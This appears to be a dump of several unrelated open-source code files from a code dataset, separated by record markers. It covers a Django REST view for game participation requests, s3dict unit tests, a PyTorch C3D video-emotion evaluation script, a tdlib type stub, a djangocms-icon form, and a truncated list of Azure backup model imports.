                        request_to_game=game,
                        request_datetime=request_datetime)
class GamePaticipationRequestDetailPermission(permissions.BasePermission):
    """Allow only the requesting player or the game admin, and only while the
    request is still pending (no state set)."""
    # NOTE(review): class name is misspelled ("Paticipation"); renaming would
    # also require changing its usage site below, so it is left unchanged here.
    def has_object_permission(self, request, view, obj):
        return ((request.user == obj.request_from.user or request.user == obj.request_to_game.admin) and not obj.state)
class GameParticipationRequestDetail(generics.RetrieveUpdateAPIView):
    """Retrieve or PATCH a single game participation request.

    PATCH actions on a pending request: ``cancel`` (requesting player only),
    ``accept`` and ``decline`` (game admin only). Accepting adds the player
    to the game and notifies them; related notifications are kept in sync.
    """
    lookup_field = 'id'
    queryset = GameParticipationRequest.objects.all()
    serializer_class = GameParticipationRequestSerializer
    permission_classes = [permissions.IsAuthenticated, GamePaticipationRequestDetailPermission]
    # override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
    def put(self, request, *args, **kwargs):
        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
    def perform_update(self, serializer):
        participation_request = GameParticipationRequest.objects.get(id=self.kwargs['id'])
        # Only the requester or the game admin may act, and only while pending.
        if not ((self.request.user == participation_request.request_from.user or self.request.user == participation_request.request_to_game.admin) and not participation_request.state):
            raise exceptions.PermissionDenied()
        if self.request.user == participation_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
            # Remove notification from game admin if it still is unread
            notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
                                                       creation_datetime=participation_request.request_datetime,
                                                       user=participation_request.request_to_game.admin,
                                                       read=False)
            if notification:
                notification.delete()
            serializer.save(state="CANCELED",
                            action_taken_datetime=timezone.now())
        elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'accept':
            request_datetime = timezone.now()
            # Add player to game players list and send notification to player
            participation_request.request_to_game.players.add(participation_request.request_from)
            notification = Notification(notification_type=NotificationType.ADDED_TO_GAME.value,
                                        creation_datetime=request_datetime,
                                        sender=participation_request.request_to_game.admin,
                                        game=participation_request.request_to_game,
                                        user=participation_request.request_from.user)
            notification.save()
            # Mark game participation request notification as read if it still is unread
            participation_request_notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
                                                                             creation_datetime=participation_request.request_datetime,
                                                                             user=participation_request.request_to_game.admin,
                                                                             read=False)
            if participation_request_notification:
                participation_request_notification = Notification.objects.get(pk=participation_request_notification[0].pk)
                participation_request_notification.read = True
                participation_request_notification.read_datetime = request_datetime
                participation_request_notification.save()
            # Update participation_request state and save datetime of action_taken
            serializer.save(state="ACCEPTED",
                            action_taken_datetime=request_datetime)
        elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'decline':
            request_datetime = timezone.now()
            # Mark game participation request notification as read if it still is unread
            notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
                                                       creation_datetime=participation_request.request_datetime,
                                                       user=participation_request.request_to_game.admin,
                                                       read=False)
            if notification:
                notification = Notification.objects.get(pk=notification[0].pk)
                notification.read = True
                notification.read_datetime = request_datetime
                notification.save()
            # Update participation_request state and save datetime of action_taken
            serializer.save(state="DECLINED",
                            action_taken_datetime=request_datetime)
        else:
            raise exceptions.ParseError()
| StarcoderdataPython |
1707876 | #!/usr/bin/env python
import s3dict
import unittest
import os
import sys
class TestS3Dict(unittest.TestCase):
    """Unit tests for s3dict: reading, creating and unioning pronunciation dicts.

    FIX: ported from Python 2 — the old ``print foo`` statement is a syntax
    error under Python 3; the deprecated ``assertEquals``/``assert_`` aliases
    and the try/except/else-self.fail() pattern are replaced with
    ``assertEqual``/``assertIn`` and ``assertRaises`` context managers.
    """

    def setUp(self):
        self.basedir = os.path.dirname(__file__)

    def testRead(self):
        foodict = s3dict.open(os.path.join(self.basedir, "test", "foo.dict"))
        self.assertIn('AH', foodict.phoneset)
        self.assertEqual(foodict.get_phones('A'), ['AH'])
        self.assertEqual(foodict.get_alt_phones('A', 2), ['EY'])
        self.assertEqual(foodict.get_phones('ZSWANG'), ['S', 'W', 'AE', 'NG'])
        # Unknown words raise KeyError; out-of-range alternates raise IndexError.
        with self.assertRaises(KeyError):
            foodict.get_phones('QRXG')
        with self.assertRaises(IndexError):
            foodict.get_alt_phones('A', 3)
        with self.assertRaises(KeyError):
            foodict.get_alt_phones('!@#$!@', 3)
        # Indexing syntax mirrors the accessor methods.
        self.assertEqual(foodict['A'], ['AH'])
        self.assertEqual(foodict['A', 2], ['EY'])
        self.assertEqual(foodict['A(2)'], ['EY'])
        self.assertEqual(foodict['ZSWANG'], ['S', 'W', 'AE', 'NG'])

    def testCreate(self):
        mydict = s3dict.S3Dict()
        mydict.set_phones('A', ['AH'])
        mydict.add_alt_phones('A', ['EY'])
        mydict.set_phones('ZSWANG', ['S', 'W', 'AE', 'NG'])
        mydict.set_alt_phones('A', 2, ['EY'])
        # Setting an alternate beyond the current count is rejected.
        with self.assertRaises(IndexError):
            mydict.set_alt_phones('A', 5, ['AX'])
        self.assertEqual(mydict.get_phones('A'), ['AH'])
        self.assertEqual(mydict.get_alt_phones('A', 2), ['EY'])
        self.assertEqual(mydict.get_phones('ZSWANG'), ['S', 'W', 'AE', 'NG'])
        # Alternates can be overwritten in place.
        mydict.set_alt_phones('A', 2, ['AA'])
        self.assertEqual(mydict.get_alt_phones('A', 2), ['AA'])
        self.assertIn('ZSWANG', mydict)
        mydict.del_phones('ZSWANG')
        self.assertNotIn('ZSWANG', mydict)
        # Deleting the only word using a phone removes it from the phoneset.
        self.assertNotIn('NG', mydict.phoneset)

    def testUnion(self):
        foodict = s3dict.open(os.path.join(self.basedir, "test", "foo.dict"))
        bardict = s3dict.open(os.path.join(self.basedir, "test", "bar.dict"))
        bazdict = s3dict.union(foodict, bardict)
        self.assertEqual(foodict['ACTUALLY'], bazdict['ACTUALLY'])
        self.assertIn('ABANDONED', bazdict)
        self.assertIn('ZONES', bazdict)
        self.assertIn('ZSWANG', bazdict)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
3338561 | <gh_stars>0
import timeit
from datetime import datetime
import socket
import os
import glob
from tqdm import tqdm
import numpy as np
import matplotlib.pyplot as plt
import torch
from tensorboardX import SummaryWriter
from torch import nn, optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import seaborn as sns
from sklearn.metrics import confusion_matrix
from dataloaders.dataset import VideoDataset
from network import C3D_model, R2Plus1D_model, R3D_model
# Evaluation script: run a trained C3D (7 emotion classes) over the validation
# split and dump per-clip softmax probabilities and ground-truth labels to .npy.
dataset = 'ucf101'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = C3D_model.C3D(num_classes=7, pretrained=True)
criterion = nn.CrossEntropyLoss()
# NOTE(review): checkpoint path is machine-specific; map_location keeps tensors
# on their saved device when loading on CPU-only machines.
checkpoint = torch.load("/home/liuhan/C3D/C3D-network/run/run_7/models/C3D-ucf101_epoch-119.pth.tar",map_location=lambda storage, loc: storage)
model.load_state_dict(checkpoint['state_dict'])
model.to(device)
criterion.to(device)
# batch_size=1 so each iteration yields exactly one clip, indexed by `count`.
test_dataloader = DataLoader(VideoDataset(dataset=dataset, split='val', clip_len=16), batch_size=1, num_workers=4, shuffle=False)
model.eval()
# running_loss/running_corrects are initialized but never updated below.
running_loss = 0.0
running_corrects = 0.0
# One softmax row of 7 class probabilities per clip, plus its true label.
all_list = np.zeros((len(test_dataloader),7))
label = np.zeros(len(test_dataloader))
count = 0
for inputs, labels in tqdm(test_dataloader):
    inputs = inputs.to(device)
    labels = labels.to(device)
    label[count] = np.array(labels)
    with torch.no_grad():
        outputs = model(inputs)
    probs = nn.Softmax(dim=1)(outputs)
    # preds is computed but unused here; predictions are derived from the
    # saved probabilities downstream.
    preds = torch.max(probs, 1)[1]
    all_list[count,:] = np.array(probs)[0]
    count = count + 1
np.save('Visual.npy',all_list)
np.save('label.npy',label)
#For plot the Confusion Matrix
'''
true_list = list(true_list)
pred_list = list(pred_list)
sns.set()
f,ax=plt.subplots()
pattern = {0:'Anger', 1:'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Neutral', 5: 'Sad', 6: 'Surprise'}
true_list = [pattern[x] if x in pattern else x for x in true_list]
pred_list = [pattern[x] if x in pattern else x for x in pred_list]
C2= confusion_matrix(true_list, pred_list, labels=['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'])
C2 = C2.astype('float')/C2.sum(axis=1).T
print(C2)
sns.heatmap(C2,annot=False,ax=ax, xticklabels =['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'], yticklabels =['Anger','Disgust', 'Fear' , 'Happy' , 'Neutral', 'Sad', 'Surprise'])
label_y = ax.get_yticklabels()
plt.setp(label_y, rotation=45, horizontalalignment='right')
label_x = ax.get_xticklabels()
plt.setp(label_x, rotation=45, horizontalalignment='right')
plt.xlabel('Predicted label')
plt.ylabel('True label')
plt.tight_layout()
#ax.set_xlabel('Predicted label')
#ax.set_ylabel('True label')
plt.savefig("/home/liuhan/C3D/C3D-network/CAER_Confusion.png", dpi=300)
'''
| StarcoderdataPython |
80145 | <reponame>Mr-TelegramBot/python-tdlib
from ..factory import Type
class chatReportReasonViolence(Type):
    """Marker type for the "violence" chat report reason.

    Carries no fields of its own; all behaviour comes from the factory
    ``Type`` base class. The non-PEP8 class name mirrors the wire-format
    type name it represents.
    """
    pass
| StarcoderdataPython |
3353351 | <reponame>Kaushal-Dhungel/djangocms-icon
from django import forms
from .fields import IconField
from .models import Icon
class IconForm(forms.ModelForm):
    """Model form for the ``Icon`` model.

    Overrides the auto-generated form field for ``icon`` with the custom
    ``IconField`` and forces a value to be supplied.
    """

    icon = IconField(required=True)

    class Meta:
        # Only these model fields are editable through this form.
        model = Icon
        fields = ('label', 'icon', 'template', 'attributes',)
| StarcoderdataPython |
3383551 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._models_py3 import AzureBackupGoalFeatureSupportRequest
from ._models_py3 import AzureBackupServerContainer
from ._models_py3 import AzureBackupServerEngine
from ._models_py3 import AzureFileShareBackupRequest
from ._models_py3 import AzureFileShareProtectableItem
from ._models_py3 import AzureFileShareProtectionPolicy
from ._models_py3 import AzureFileShareProvisionILRRequest
from ._models_py3 import AzureFileShareRecoveryPoint
from ._models_py3 import AzureFileShareRestoreRequest
from ._models_py3 import AzureFileshareProtectedItem
from ._models_py3 import AzureFileshareProtectedItemExtendedInfo
from ._models_py3 import AzureIaaSClassicComputeVMContainer
from ._models_py3 import AzureIaaSClassicComputeVMProtectableItem
from ._models_py3 import AzureIaaSClassicComputeVMProtectedItem
from ._models_py3 import AzureIaaSComputeVMContainer
from ._models_py3 import AzureIaaSComputeVMProtectableItem
from ._models_py3 import AzureIaaSComputeVMProtectedItem
from ._models_py3 import AzureIaaSVMErrorInfo
from ._models_py3 import AzureIaaSVMHealthDetails
from ._models_py3 import AzureIaaSVMJob
from ._models_py3 import AzureIaaSVMJobExtendedInfo
from ._models_py3 import AzureIaaSVMJobTaskDetails
from ._models_py3 import AzureIaaSVMJobV2
from ._models_py3 import AzureIaaSVMProtectedItem
from ._models_py3 import AzureIaaSVMProtectedItemExtendedInfo
from ._models_py3 import AzureIaaSVMProtectionPolicy
from ._models_py3 import AzureRecoveryServiceVaultProtectionIntent
from ._models_py3 import AzureResourceProtectionIntent
from ._models_py3 import AzureSQLAGWorkloadContainerProtectionContainer
from ._models_py3 import AzureSqlContainer
from ._models_py3 import AzureSqlProtectedItem
from ._models_py3 import AzureSqlProtectedItemExtendedInfo
from ._models_py3 import AzureSqlProtectionPolicy
from ._models_py3 import AzureStorageContainer
from ._models_py3 import AzureStorageErrorInfo
from ._models_py3 import AzureStorageJob
from ._models_py3 import AzureStorageJobExtendedInfo
from ._models_py3 import AzureStorageJobTaskDetails
from ._models_py3 import AzureStorageProtectableContainer
from ._models_py3 import AzureVMAppContainerProtectableContainer
from ._models_py3 import AzureVMAppContainerProtectionContainer
from ._models_py3 import AzureVMResourceFeatureSupportRequest
from ._models_py3 import AzureVMResourceFeatureSupportResponse
from ._models_py3 import AzureVmWorkloadItem
from ._models_py3 import AzureVmWorkloadProtectableItem
from ._models_py3 import AzureVmWorkloadProtectedItem
from ._models_py3 import AzureVmWorkloadProtectedItemExtendedInfo
from ._models_py3 import AzureVmWorkloadProtectionPolicy
from ._models_py3 import AzureVmWorkloadSAPAseDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSAPAseDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPAseSystemProtectableItem
from ._models_py3 import AzureVmWorkloadSAPAseSystemWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseProtectableItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSAPHanaDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSAPHanaSystemProtectableItem
from ._models_py3 import AzureVmWorkloadSAPHanaSystemWorkloadItem
from ._models_py3 import AzureVmWorkloadSQLAvailabilityGroupProtectableItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseProtectableItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseProtectedItem
from ._models_py3 import AzureVmWorkloadSQLDatabaseWorkloadItem
from ._models_py3 import AzureVmWorkloadSQLInstanceProtectableItem
from ._models_py3 import AzureVmWorkloadSQLInstanceWorkloadItem
from ._models_py3 import AzureWorkloadAutoProtectionIntent
from ._models_py3 import AzureWorkloadBackupRequest
from ._models_py3 import AzureWorkloadContainer
from ._models_py3 import AzureWorkloadContainerAutoProtectionIntent
from ._models_py3 import AzureWorkloadContainerExtendedInfo
from ._models_py3 import AzureWorkloadErrorInfo
from ._models_py3 import AzureWorkloadJob
from ._models_py3 import AzureWorkloadJobExtendedInfo
from ._models_py3 import AzureWorkloadJobTaskDetails
from ._models_py3 import AzureWorkloadPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadRecoveryPoint
from ._models_py3 import AzureWorkloadRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaPointInTimeRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSAPHanaRecoveryPoint
from ._models_py3 import AzureWorkloadSAPHanaRestoreRequest
from ._models_py3 import AzureWorkloadSAPHanaRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSQLAutoProtectionIntent
from ._models_py3 import AzureWorkloadSQLPointInTimeRecoveryPoint
from ._models_py3 import AzureWorkloadSQLPointInTimeRestoreRequest
from ._models_py3 import AzureWorkloadSQLPointInTimeRestoreWithRehydrateRequest
from ._models_py3 import AzureWorkloadSQLRecoveryPoint
from ._models_py3 import AzureWorkloadSQLRecoveryPointExtendedInfo
from ._models_py3 import AzureWorkloadSQLRestoreRequest
from ._models_py3 import AzureWorkloadSQLRestoreWithRehydrateRequest
from ._models_py3 import BEKDetails
from ._models_py3 import BMSBackupEngineQueryObject
from ._models_py3 import BMSBackupEnginesQueryObject
from ._models_py3 import BMSBackupSummariesQueryObject
from ._models_py3 import BMSContainerQueryObject
from ._models_py3 import BMSContainersInquiryQueryObject
from ._models_py3 import BMSPOQueryObject
from ._models_py3 import BMSRPQueryObject
from ._models_py3 import BMSRefreshContainersQueryObject
from ._models_py3 import BMSWorkloadItemQueryObject
from ._models_py3 import BackupEngineBase
from ._models_py3 import BackupEngineBaseResource
from ._models_py3 import BackupEngineBaseResourceList
from ._models_py3 import BackupEngineExtendedInfo
from ._models_py3 import BackupManagementUsage
from ._models_py3 import BackupManagementUsageList
from ._models_py3 import BackupRequest
from ._models_py3 import BackupRequestResource
from ._models_py3 import BackupResourceConfig
from ._models_py3 import BackupResourceConfigResource
from ._models_py3 import BackupResourceEncryptionConfig
from ._models_py3 import BackupResourceEncryptionConfigExtended
from ._models_py3 import BackupResourceEncryptionConfigExtendedResource
from ._models_py3 import BackupResourceEncryptionConfigResource
from ._models_py3 import BackupResourceVaultConfig
from ._models_py3 import BackupResourceVaultConfigResource
from ._models_py3 import BackupStatusRequest
from ._models_py3 import BackupStatusResponse
from ._models_py3 import ClientDiscoveryDisplay
from ._models_py3 import ClientDiscoveryForLogSpecification
from ._models_py3 import ClientDiscoveryForProperties
from ._models_py3 import ClientDiscoveryForServiceSpecification
from ._models_py3 import ClientDiscoveryResponse
from ._models_py3 import ClientDiscoveryValueForSingleApi
from ._models_py3 import ClientScriptForConnect
from ._models_py3 import CloudErrorBody
from ._models_py3 import ContainerIdentityInfo
from ._models_py3 import DPMContainerExtendedInfo
from ._models_py3 import DPMProtectedItem
from ._models_py3 import DPMProtectedItemExtendedInfo
from ._models_py3 import DailyRetentionFormat
from ._models_py3 import DailyRetentionSchedule
from ._models_py3 import DailySchedule
from ._models_py3 import Day
from ._models_py3 import DiskExclusionProperties
from ._models_py3 import DiskInformation
from ._models_py3 import DistributedNodesInfo
from ._models_py3 import DpmBackupEngine
from ._models_py3 import DpmContainer
from ._models_py3 import DpmErrorInfo
from ._models_py3 import DpmJob
from ._models_py3 import DpmJobExtendedInfo
from ._models_py3 import DpmJobTaskDetails
from ._models_py3 import EncryptionDetails
from ._models_py3 import ErrorAdditionalInfo
from ._models_py3 import ErrorDetail
from ._models_py3 import ExportJobsOperationResultInfo
from ._models_py3 import ExtendedProperties
from ._models_py3 import FeatureSupportRequest
from ._models_py3 import GenericContainer
from ._models_py3 import GenericContainerExtendedInfo
from ._models_py3 import GenericProtectedItem
from ._models_py3 import GenericProtectionPolicy
from ._models_py3 import GenericRecoveryPoint
from ._models_py3 import GetProtectedItemQueryObject
from ._models_py3 import HourlySchedule
from ._models_py3 import ILRRequest
from ._models_py3 import ILRRequestResource
from ._models_py3 import IaaSVMContainer
from ._models_py3 import IaaSVMProtectableItem
from ._models_py3 import IaasVMBackupRequest
from ._models_py3 import IaasVMILRRegistrationRequest
from ._models_py3 import IaasVMRecoveryPoint
from ._models_py3 import IaasVMRestoreRequest
from ._models_py3 import IaasVMRestoreWithRehydrationRequest
from ._models_py3 import IdentityBasedRestoreDetails
from ._models_py3 import IdentityInfo
from ._models_py3 import InquiryInfo
from ._models_py3 import InquiryValidation
from ._models_py3 import InstantItemRecoveryTarget
from ._models_py3 import InstantRPAdditionalDetails
from ._models_py3 import Job
from ._models_py3 import JobQueryObject
from ._models_py3 import JobResource
from ._models_py3 import JobResourceList
from ._models_py3 import KEKDetails
from ._models_py3 import KPIResourceHealthDetails
from ._models_py3 import KeyAndSecretDetails
from ._models_py3 import ListRecoveryPointsRecommendedForMoveRequest
from ._models_py3 import LogSchedulePolicy
from ._models_py3 import LongTermRetentionPolicy
from ._models_py3 import LongTermSchedulePolicy
from ._models_py3 import MABContainerHealthDetails
from ._models_py3 import MabContainer
from ._models_py3 import MabContainerExtendedInfo
from ._models_py3 import MabErrorInfo
from ._models_py3 import MabFileFolderProtectedItem
from ._models_py3 import MabFileFolderProtectedItemExtendedInfo
from ._models_py3 import MabJob
from ._models_py3 import MabJobExtendedInfo
from ._models_py3 import MabJobTaskDetails
from ._models_py3 import MabProtectionPolicy
from ._models_py3 import MonthlyRetentionSchedule
from ._models_py3 import MoveRPAcrossTiersRequest
from ._models_py3 import NameInfo
from ._models_py3 import NewErrorResponse
from ._models_py3 import NewErrorResponseError
from ._models_py3 import OperationResultInfo
from ._models_py3 import OperationResultInfoBase
from ._models_py3 import OperationResultInfoBaseResource
from ._models_py3 import OperationStatus
from ._models_py3 import OperationStatusError
from ._models_py3 import OperationStatusExtendedInfo
from ._models_py3 import OperationStatusJobExtendedInfo
from ._models_py3 import OperationStatusJobsExtendedInfo
from ._models_py3 import OperationStatusProvisionILRExtendedInfo
from ._models_py3 import OperationStatusValidateOperationExtendedInfo
from ._models_py3 import OperationWorkerResponse
from ._models_py3 import PointInTimeRange
from ._models_py3 import PreBackupValidation
from ._models_py3 import PreValidateEnableBackupRequest
from ._models_py3 import PreValidateEnableBackupResponse
from ._models_py3 import PrepareDataMoveRequest
from ._models_py3 import PrepareDataMoveResponse
from ._models_py3 import PrivateEndpoint
from ._models_py3 import PrivateEndpointConnection
from ._models_py3 import PrivateEndpointConnectionResource
from ._models_py3 import PrivateLinkServiceConnectionState
from ._models_py3 import ProtectableContainer
from ._models_py3 import ProtectableContainerResource
from ._models_py3 import ProtectableContainerResourceList
from ._models_py3 import ProtectedItem
from ._models_py3 import ProtectedItemQueryObject
from ._models_py3 import ProtectedItemResource
from ._models_py3 import ProtectedItemResourceList
from ._models_py3 import ProtectionContainer
from ._models_py3 import ProtectionContainerResource
from ._models_py3 import ProtectionContainerResourceList
from ._models_py3 import ProtectionIntent
from ._models_py3 import ProtectionIntentQueryObject
from ._models_py3 import ProtectionIntentResource
from ._models_py3 import ProtectionIntentResourceList
from ._models_py3 import ProtectionPolicy
from ._models_py3 import ProtectionPolicyQueryObject
from ._models_py3 import ProtectionPolicyResource
from ._models_py3 import ProtectionPolicyResourceList
from ._models_py3 import RecoveryPoint
from ._models_py3 import RecoveryPointDiskConfiguration
from ._models_py3 import RecoveryPointMoveReadinessInfo
from ._models_py3 import RecoveryPointRehydrationInfo
from ._models_py3 import RecoveryPointResource
from ._models_py3 import RecoveryPointResourceList
from ._models_py3 import RecoveryPointTierInformation
from ._models_py3 import RecoveryPointTierInformationV2
from ._models_py3 import Resource
from ._models_py3 import ResourceGuardOperationDetail
from ._models_py3 import ResourceGuardProxyBase
from ._models_py3 import ResourceGuardProxyBaseResource
from ._models_py3 import ResourceGuardProxyBaseResourceList
from ._models_py3 import ResourceHealthDetails
from ._models_py3 import ResourceList
from ._models_py3 import RestoreFileSpecs
from ._models_py3 import RestoreRequest
from ._models_py3 import RestoreRequestResource
from ._models_py3 import RetentionDuration
from ._models_py3 import RetentionPolicy
from ._models_py3 import SQLDataDirectory
from ._models_py3 import SQLDataDirectoryMapping
from ._models_py3 import SchedulePolicy
from ._models_py3 import SecurityPinBase
from ._models_py3 import Settings
from ._models_py3 import SimpleRetentionPolicy
from ._models_py3 import SimpleSchedulePolicy
from ._models_py3 import SimpleSchedulePolicyV2
from ._models_py3 import SubProtectionPolicy
from ._models_py3 import TargetAFSRestoreInfo
from ._models_py3 import TargetRestoreInfo
from ._models_py3 import TieringPolicy
from ._models_py3 import TokenInformation
from ._models_py3 import TriggerDataMoveRequest
from ._models_py3 import UnlockDeleteRequest
from ._models_py3 import UnlockDeleteResponse
from ._models_py3 import ValidateIaasVMRestoreOperationRequest
from ._models_py3 import ValidateOperationRequest
from ._models_py3 import ValidateOperationResponse
from ._models_py3 import ValidateOperationsResponse
from ._models_py3 import ValidateRestoreOperationRequest
from ._models_py3 import VaultJob
from ._models_py3 import VaultJobErrorInfo
from ._models_py3 import VaultJobExtendedInfo
from ._models_py3 import VaultStorageConfigOperationResultResponse
from ._models_py3 import WeeklyRetentionFormat
from ._models_py3 import WeeklyRetentionSchedule
from ._models_py3 import WeeklySchedule
from ._models_py3 import WorkloadInquiryDetails
from ._models_py3 import WorkloadItem
from ._models_py3 import WorkloadItemResource
from ._models_py3 import WorkloadItemResourceList
from ._models_py3 import WorkloadProtectableItem
from ._models_py3 import WorkloadProtectableItemResource
from ._models_py3 import WorkloadProtectableItemResourceList
from ._models_py3 import YearlyRetentionSchedule
from ._recovery_services_backup_client_enums import (
AcquireStorageAccountLock,
AzureFileShareType,
BackupEngineType,
BackupItemType,
BackupManagementType,
BackupType,
ContainerType,
CopyOptions,
CreateMode,
DataMoveLevel,
DataSourceType,
DayOfWeek,
DedupState,
EncryptionAtRestType,
EnhancedSecurityState,
FabricName,
HealthState,
HealthStatus,
HttpStatusCode,
IAASVMPolicyType,
InfrastructureEncryptionState,
InquiryStatus,
IntentItemType,
JobOperationType,
JobStatus,
JobSupportedAction,
LastBackupStatus,
LastUpdateStatus,
MabServerType,
MonthOfYear,
OperationStatusValues,
OperationType,
OverwriteOptions,
PolicyType,
PrivateEndpointConnectionStatus,
ProtectedItemHealthStatus,
ProtectedItemState,
ProtectionIntentItemType,
ProtectionState,
ProtectionStatus,
ProvisioningState,
RecoveryMode,
RecoveryPointTierStatus,
RecoveryPointTierType,
RecoveryType,
RehydrationPriority,
ResourceHealthStatus,
RestorePointQueryType,
RestorePointType,
RestoreRequestType,
RetentionDurationType,
RetentionScheduleFormat,
SQLDataDirectoryType,
ScheduleRunType,
SoftDeleteFeatureState,
StorageType,
StorageTypeState,
SupportStatus,
TieringMode,
Type,
UsagesUnit,
ValidationStatus,
WeekOfMonth,
WorkloadItemType,
WorkloadType,
XcoolState,
)
__all__ = [
'AzureBackupGoalFeatureSupportRequest',
'AzureBackupServerContainer',
'AzureBackupServerEngine',
'AzureFileShareBackupRequest',
'AzureFileShareProtectableItem',
'AzureFileShareProtectionPolicy',
'AzureFileShareProvisionILRRequest',
'AzureFileShareRecoveryPoint',
'AzureFileShareRestoreRequest',
'AzureFileshareProtectedItem',
'AzureFileshareProtectedItemExtendedInfo',
'AzureIaaSClassicComputeVMContainer',
'AzureIaaSClassicComputeVMProtectableItem',
'AzureIaaSClassicComputeVMProtectedItem',
'AzureIaaSComputeVMContainer',
'AzureIaaSComputeVMProtectableItem',
'AzureIaaSComputeVMProtectedItem',
'AzureIaaSVMErrorInfo',
'AzureIaaSVMHealthDetails',
'AzureIaaSVMJob',
'AzureIaaSVMJobExtendedInfo',
'AzureIaaSVMJobTaskDetails',
'AzureIaaSVMJobV2',
'AzureIaaSVMProtectedItem',
'AzureIaaSVMProtectedItemExtendedInfo',
'AzureIaaSVMProtectionPolicy',
'AzureRecoveryServiceVaultProtectionIntent',
'AzureResourceProtectionIntent',
'AzureSQLAGWorkloadContainerProtectionContainer',
'AzureSqlContainer',
'AzureSqlProtectedItem',
'AzureSqlProtectedItemExtendedInfo',
'AzureSqlProtectionPolicy',
'AzureStorageContainer',
'AzureStorageErrorInfo',
'AzureStorageJob',
'AzureStorageJobExtendedInfo',
'AzureStorageJobTaskDetails',
'AzureStorageProtectableContainer',
'AzureVMAppContainerProtectableContainer',
'AzureVMAppContainerProtectionContainer',
'AzureVMResourceFeatureSupportRequest',
'AzureVMResourceFeatureSupportResponse',
'AzureVmWorkloadItem',
'AzureVmWorkloadProtectableItem',
'AzureVmWorkloadProtectedItem',
'AzureVmWorkloadProtectedItemExtendedInfo',
'AzureVmWorkloadProtectionPolicy',
'AzureVmWorkloadSAPAseDatabaseProtectedItem',
'AzureVmWorkloadSAPAseDatabaseWorkloadItem',
'AzureVmWorkloadSAPAseSystemProtectableItem',
'AzureVmWorkloadSAPAseSystemWorkloadItem',
'AzureVmWorkloadSAPHanaDatabaseProtectableItem',
'AzureVmWorkloadSAPHanaDatabaseProtectedItem',
'AzureVmWorkloadSAPHanaDatabaseWorkloadItem',
'AzureVmWorkloadSAPHanaSystemProtectableItem',
'AzureVmWorkloadSAPHanaSystemWorkloadItem',
'AzureVmWorkloadSQLAvailabilityGroupProtectableItem',
'AzureVmWorkloadSQLDatabaseProtectableItem',
'AzureVmWorkloadSQLDatabaseProtectedItem',
'AzureVmWorkloadSQLDatabaseWorkloadItem',
'AzureVmWorkloadSQLInstanceProtectableItem',
'AzureVmWorkloadSQLInstanceWorkloadItem',
'AzureWorkloadAutoProtectionIntent',
'AzureWorkloadBackupRequest',
'AzureWorkloadContainer',
'AzureWorkloadContainerAutoProtectionIntent',
'AzureWorkloadContainerExtendedInfo',
'AzureWorkloadErrorInfo',
'AzureWorkloadJob',
'AzureWorkloadJobExtendedInfo',
'AzureWorkloadJobTaskDetails',
'AzureWorkloadPointInTimeRecoveryPoint',
'AzureWorkloadPointInTimeRestoreRequest',
'AzureWorkloadRecoveryPoint',
'AzureWorkloadRestoreRequest',
'AzureWorkloadSAPHanaPointInTimeRecoveryPoint',
'AzureWorkloadSAPHanaPointInTimeRestoreRequest',
'AzureWorkloadSAPHanaPointInTimeRestoreWithRehydrateRequest',
'AzureWorkloadSAPHanaRecoveryPoint',
'AzureWorkloadSAPHanaRestoreRequest',
'AzureWorkloadSAPHanaRestoreWithRehydrateRequest',
'AzureWorkloadSQLAutoProtectionIntent',
'AzureWorkloadSQLPointInTimeRecoveryPoint',
'AzureWorkloadSQLPointInTimeRestoreRequest',
'AzureWorkloadSQLPointInTimeRestoreWithRehydrateRequest',
'AzureWorkloadSQLRecoveryPoint',
'AzureWorkloadSQLRecoveryPointExtendedInfo',
'AzureWorkloadSQLRestoreRequest',
'AzureWorkloadSQLRestoreWithRehydrateRequest',
'BEKDetails',
'BMSBackupEngineQueryObject',
'BMSBackupEnginesQueryObject',
'BMSBackupSummariesQueryObject',
'BMSContainerQueryObject',
'BMSContainersInquiryQueryObject',
'BMSPOQueryObject',
'BMSRPQueryObject',
'BMSRefreshContainersQueryObject',
'BMSWorkloadItemQueryObject',
'BackupEngineBase',
'BackupEngineBaseResource',
'BackupEngineBaseResourceList',
'BackupEngineExtendedInfo',
'BackupManagementUsage',
'BackupManagementUsageList',
'BackupRequest',
'BackupRequestResource',
'BackupResourceConfig',
'BackupResourceConfigResource',
'BackupResourceEncryptionConfig',
'BackupResourceEncryptionConfigExtended',
'BackupResourceEncryptionConfigExtendedResource',
'BackupResourceEncryptionConfigResource',
'BackupResourceVaultConfig',
